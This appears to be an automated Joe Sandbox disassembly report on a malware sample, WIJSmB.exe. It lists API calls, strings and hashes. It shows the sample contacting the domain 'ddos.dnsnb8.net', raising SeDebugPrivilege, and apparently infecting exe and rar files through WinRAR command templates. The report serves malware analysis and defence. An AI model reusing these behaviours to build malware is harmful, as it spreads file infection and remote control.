CloseHandle.KERNEL32(?,?,004A32B0,00000164,004A2986,?), ref: 004A234E
CloseHandle.KERNEL32(000000FF,?,004A32B0,00000164,004A2986,?), ref: 004A2359

Strings

C@J, xrefs: 004A229E
.@J, xrefs: 004A2274
m@J, xrefs: 004A1E8F, 004A225A
5@J, xrefs: 004A2282
<@J, xrefs: 004A2290

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@J$5@J$<@J$C@J$m@J
API String ID: 3043204753-3086561988
Opcode ID: 19dfea2168a7da738ba05a32e86d3bed9282efb075ea2dcf1f1b446457451204
Instruction ID: cfb1f6f0c01571b0b73c3e48f417ef77fec9afa439786a8bd06fac5f8f58f293
Opcode Fuzzy Hash: 19dfea2168a7da738ba05a32e86d3bed9282efb075ea2dcf1f1b446457451204
Instruction Fuzzy Hash: A1F18071900208EFCF10DFA8CD80AAEBBB5FF5A314F10852AE519A7661D778AD41DF58

Function 004A1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\NJ`NJ,00000000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004A19BA
Sleep.KERNEL32(00000064), ref: 004A19C6
wsprintfA.USER32 ref: 004A19EC
CopyFileA.KERNEL32(?,?,00000000), ref: 004A1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A1A1E
GetFileSize.KERNEL32(?,00000000), ref: 004A1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004A1A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004A1A65
CloseHandle.KERNEL32(000000FF), ref: 004A1A90
DeleteFileA.KERNEL32(?), ref: 004A1AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004A1AC1

Strings

%s%.8X.data, xrefs: 004A19E6
\NJ`NJ, xrefs: 004A1980
C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A197C
C:\Users\user\AppData\Local\Temp\, xrefs: 004A19DB

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WIJSmB.exe$\NJ`NJ
API String ID: 716042067-777670406
Opcode ID: d1c8e85c70ac02e5575c4558db71616caafe1746c52d367e754cf531a404ea28
Instruction ID: ae5913ea1b44b9e3bcd64e65750bfa5b0e5e620c30565849483c9311d7d4996b
Opcode Fuzzy Hash: d1c8e85c70ac02e5575c4558db71616caafe1746c52d367e754cf531a404ea28
Instruction Fuzzy Hash: 43517E71A01219EFCF209F98CC84AAFBBB8FB16355F10456AF515E62A0D3789E40CB58

Function 004A28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004A28D3
wsprintfA.USER32 ref: 004A28F7
memset.MSVCRT ref: 004A2925
wsprintfA.USER32 ref: 004A2940

Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2A02
Part of subcall function 004A29E2: wsprintfA.USER32 ref: 004A2A1A
Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2A44
Part of subcall function 004A29E2: lstrlen.KERNEL32(?), ref: 004A2A54
Part of subcall function 004A29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 004A2A6C
Part of subcall function 004A29E2: strrchr.MSVCRT ref: 004A2A7C
Part of subcall function 004A29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 004A2A9F
Part of subcall function 004A29E2: lstrlen.KERNEL32(Documents and Settings), ref: 004A2AAE
Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2AC6
Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2ADA
Part of subcall function 004A29E2: FindFirstFileA.KERNEL32(?,?), ref: 004A2AEF
Part of subcall function 004A29E2: memset.MSVCRT ref: 004A2B13

strrchr.MSVCRT ref: 004A2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 004A2974

Strings

rar, xrefs: 004A2988
%s\, xrefs: 004A293A
%s%s, xrefs: 004A28F1
exe, xrefs: 004A296D
C:\Users\user\AppData\Local\Temp\, xrefs: 004A29B3

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-898104377
Opcode ID: d202ca8010fbc09a2aac46cacfd680ef5cb96d2feb45e35d746eab9a5ed9150e
Instruction ID: 175bf26b1ebfafe392614dd8b311a4f8038c64b1c6688d0f487f15b1267a344f
Opcode Fuzzy Hash: d202ca8010fbc09a2aac46cacfd680ef5cb96d2feb45e35d746eab9a5ed9150e
Instruction Fuzzy Hash: 1B31D5B2A043087BDB209B69DC85FCB376C9B33714F140467F545A2180E6F8DAC4AB68

Function 004A1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 004A164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 004A165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WIJSmB.exe,00000104), ref: 004A166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 004A16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 004A16BD

Part of subcall function 004A139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A13BC
Part of subcall function 004A139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004A13DA
Part of subcall function 004A139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004A1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A16E5

Strings

C:\Windows\system32, xrefs: 004A1656
Documents and Settings, xrefs: 004A1696
C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A1662, 004A1667, 004A16DD
C:\Users\user\AppData\Local\Temp\, xrefs: 004A1644

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WIJSmB.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3315693372
Opcode ID: 31d6b1bd529877041895973b03254f652fd85ff622271755eac816c4552256f6
Instruction ID: af82f99dc435e2d33dbb2743edeee3e47cdcfb642c9fb5c3fa78b26f704a3340
Opcode Fuzzy Hash: 31d6b1bd529877041895973b03254f652fd85ff622271755eac816c4552256f6
Instruction Fuzzy Hash: B511E9715051147BDB205FA59D4EF9F7E6DEBA7366F100027F20995070D6B84540C7BD

Function 004A1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGJ,http://%s:%d/%s/%s,004A10E8,?), ref: 004A1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400), ref: 004A1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 004A1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 004A104B
UnmapViewOfFile.KERNEL32(00000000), ref: 004A1075
CloseHandle.KERNEL32(?), ref: 004A108B
CloseHandle.KERNEL32(00000000), ref: 004A108E

Strings

ddos.dnsnb8.net, xrefs: 004A1026
http://%s:%d/%s/%s, xrefs: 004A1000
HGJ, xrefs: 004A1001

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HGJ$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3567748804
Opcode ID: 0a84a2b95d12cee52be960dd082e198d21ab7c667d9fb9ac80f8cf6d29372931
Instruction ID: 656c2955edea3cab01e014da4b4327c8388165cd610bfb00bd6024290c29b8fd
Opcode Fuzzy Hash: 0a84a2b95d12cee52be960dd082e198d21ab7c667d9fb9ac80f8cf6d29372931
Instruction Fuzzy Hash: 710196B110835CBFE7305F609C88E2BBFACDB4679AF00453AF245A25A0E6745E448B78

Function 004A2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004A2C57

Part of subcall function 004A1973: PathFileExistsA.SHLWAPI(\NJ`NJ,00000000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1992
Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004A19BA
Part of subcall function 004A1973: Sleep.KERNEL32(00000064), ref: 004A19C6
Part of subcall function 004A1973: wsprintfA.USER32 ref: 004A19EC
Part of subcall function 004A1973: CopyFileA.KERNEL32(?,?,00000000), ref: 004A1A00
Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A1A1E
Part of subcall function 004A1973: GetFileSize.KERNEL32(?,00000000), ref: 004A1A2C
Part of subcall function 004A1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004A1A46
Part of subcall function 004A1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004A1A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 004A2C99
WaitForMultipleObjects.KERNEL32(00000001,004A16BA,00000001,000000FF,?,004A16BA,00000000), ref: 004A2CAC
VirtualFree.KERNEL32(01420000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,004A4E5C,004A4E60,?,004A16BA,00000000), ref: 004A2CC2

Strings

C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A2C69

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe
API String ID: 2042498389-2915634642
Opcode ID: 5eec8823fa7b435f43fd355ff30cb99eca04730c8770c55903686d8f93b61173
Instruction ID: 46a2c13bd5f493bd618343f3fa27689de12fb732d42dd692ce5eb8876fd89481
Opcode Fuzzy Hash: 5eec8823fa7b435f43fd355ff30cb99eca04730c8770c55903686d8f93b61173
Instruction Fuzzy Hash: AB0184716412207BD7109BA99C0AF9F7E5CEFA7B60F104126B505D61C1E6E49A00C7BD

Function 004A14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004A1504
VirtualQuery.KERNEL32(004A14E1,?,0000001C), ref: 004A1525
ExitProcess.KERNEL32 ref: 004A157A

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 339c919201c7d80cad9f856c8072d97b29edfa2b04ef60e3dc7e926b754a2f4e
Instruction ID: f02cf40b647f6c87703f55eaef5e39227ebf6b5382b5c48290bd413ae3626294
Opcode Fuzzy Hash: 339c919201c7d80cad9f856c8072d97b29edfa2b04ef60e3dc7e926b754a2f4e
Instruction Fuzzy Hash: 72113371D41214EFCB11DF65A88567E7BBCE7E6765F10403BF402E2260E27889419B5D

Function 004A1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004A1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 004A1947

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: a8b3315d8874cfe2f4e9bcabad00ca0c9216bba57996b7a4c1c79ef0c56ef13f
Instruction ID: f35de81467fd401e512d49ba6a9a3340048715651704721b67568cb6d050ea92
Opcode Fuzzy Hash: a8b3315d8874cfe2f4e9bcabad00ca0c9216bba57996b7a4c1c79ef0c56ef13f
Instruction Fuzzy Hash: 2AF06872200209BBD720DE26DC04BA77BECAB62761F00853BF526D5160E774D645DBB5

Function 004A6159 Relevance: 2.6, APIs: 2, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004A60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004A6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004A61A5

Memory Dump Source

Source File: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 317cb730c9675695a33fbb184b967fbeb5c30b81299bb6a62209cd85215d4730
Instruction ID: 5b7038244f74af55432d0703c886e6915f8790298a4580d8040d251ec4e8fcef
Opcode Fuzzy Hash: 317cb730c9675695a33fbb184b967fbeb5c30b81299bb6a62209cd85215d4730
Instruction Fuzzy Hash: F1118B32A00649CFCB319E58CC853DE37A1FF12300F6E042ADE895B391DA792981CB98

Non-executed Functions

Function 004A119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,?,?,004A13EF), ref: 004A11AB
OpenProcessToken.ADVAPI32(00000000,00000028,004A13EF,?,?,?,?,?,?,004A13EF), ref: 004A11BB
AdjustTokenPrivileges.ADVAPI32(004A13EF,00000000,?,00000010,00000000,00000000), ref: 004A11EB
CloseHandle.KERNEL32(004A13EF), ref: 004A11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,004A13EF), ref: 004A1203

Strings

C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A11A5

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe
API String ID: 75692138-2915634642
Opcode ID: 2031473365426f7a72cc44d75f4c3eff44c31d4f8fa7f3b0958c70dd3fce6823
Instruction ID: 15418a52f47bd02cdc67ffe9a21e45e755e37882f8dc1b41716fedaa50a91cb9
Opcode Fuzzy Hash: 2031473365426f7a72cc44d75f4c3eff44c31d4f8fa7f3b0958c70dd3fce6823
Instruction Fuzzy Hash: BD01E875904209EFEB00DFD4CD89AAEBFB8FB0A305F104469F606A2250E7759F449B54

Function 004A139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004A13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004A1448

Part of subcall function 004A119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,?,?,004A13EF), ref: 004A11AB
Part of subcall function 004A119F: OpenProcessToken.ADVAPI32(00000000,00000028,004A13EF,?,?,?,?,?,?,004A13EF), ref: 004A11BB
Part of subcall function 004A119F: AdjustTokenPrivileges.ADVAPI32(004A13EF,00000000,?,00000010,00000000,00000000), ref: 004A11EB
Part of subcall function 004A119F: CloseHandle.KERNEL32(004A13EF), ref: 004A11FA
Part of subcall function 004A119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,004A13EF), ref: 004A1203

Strings

SeDebugPrivilege, xrefs: 004A13D3
C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A13A8

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe$SeDebugPrivilege
API String ID: 4123949106-4065653571
Opcode ID: bf8cb829a71e3a9b6ff3e17ba0f82f0423a4af50e62a024bf2155caf6eaafe65
Instruction ID: 5571eb9dc3825ecce533477a282170bba5c58e0d5077c4ad2e5773b0a74e2010
Opcode Fuzzy Hash: bf8cb829a71e3a9b6ff3e17ba0f82f0423a4af50e62a024bf2155caf6eaafe65
Instruction Fuzzy Hash: FD314071D00209AAEF209FA68C45FEFBBB9EB5A705F20406BE505B2151D6349E45CB64

Function 004A6D00 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 0caa1733521371d7b7b9a4c7e9bb24d9c59dc7783d663fe92585ac8642537fe3
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: EA819471204B418FC714CF29C8906A7B7E2EFE6314F19C92EE4EA87751D738A849CB58

Function 004A239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 004A23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004A2464
GetFileSize.KERNEL32(00000000,00000000), ref: 004A2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 004A24A8
memset.MSVCRT ref: 004A24B9
strrchr.MSVCRT ref: 004A24C9
wsprintfA.USER32 ref: 004A24DE
strrchr.MSVCRT ref: 004A24ED
memset.MSVCRT ref: 004A24F2
memset.MSVCRT ref: 004A2505
wsprintfA.USER32 ref: 004A2524
Sleep.KERNEL32(000007D0), ref: 004A2535
Sleep.KERNEL32(000007D0), ref: 004A255D
memset.MSVCRT ref: 004A256E
wsprintfA.USER32 ref: 004A2585
memset.MSVCRT ref: 004A25A6
wsprintfA.USER32 ref: 004A25CA
Sleep.KERNEL32(000007D0), ref: 004A25D0
Sleep.KERNEL32(000007D0,?,?), ref: 004A25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004A25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 004A2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 004A2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 004A265B
SetEndOfFile.KERNEL32 ref: 004A266D
CloseHandle.KERNEL32(00000000), ref: 004A2676
RemoveDirectoryA.KERNEL32(?), ref: 004A2681

Strings

%s\, xrefs: 004A257F
%s X -ibck "%s" "%s\", xrefs: 004A251E
%s%s, xrefs: 004A24D8
-ibck, xrefs: 004A25BA
C:\Users\user\AppData\Local\Temp\, xrefs: 004A23B1, 004A23B6, 004A24CD
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 004A25C4

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2750826870
Opcode ID: fe7f144f6cfee01bed6a5ed9aca7c2099c43734b00dd62681c2cc4979e8a2792
Instruction ID: 0a7328a87e86aa305cc5471bfa3feb75c83496f3918dfae205913a51ccd4c8c5
Opcode Fuzzy Hash: fe7f144f6cfee01bed6a5ed9aca7c2099c43734b00dd62681c2cc4979e8a2792
Instruction Fuzzy Hash: 6381D1B1408304BBD710DF64DC45FAFBBECEBDA715F00052AF644D2190E7B89A499B6A

Function 004A274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004A2766
memset.MSVCRT ref: 004A2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 004A2787
wsprintfA.USER32 ref: 004A27AB

Part of subcall function 004A185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
Part of subcall function 004A185B: srand.MSVCRT ref: 004A1878
Part of subcall function 004A185B: rand.MSVCRT ref: 004A1880
Part of subcall function 004A185B: srand.MSVCRT ref: 004A1890
Part of subcall function 004A185B: rand.MSVCRT ref: 004A1894

wsprintfA.USER32 ref: 004A27C6
CopyFileA.KERNEL32(?,004A4C80,00000000), ref: 004A27D4
wsprintfA.USER32 ref: 004A27F4

Part of subcall function 004A1973: PathFileExistsA.SHLWAPI(\NJ`NJ,00000000,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1992
Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004A19BA
Part of subcall function 004A1973: Sleep.KERNEL32(00000064), ref: 004A19C6
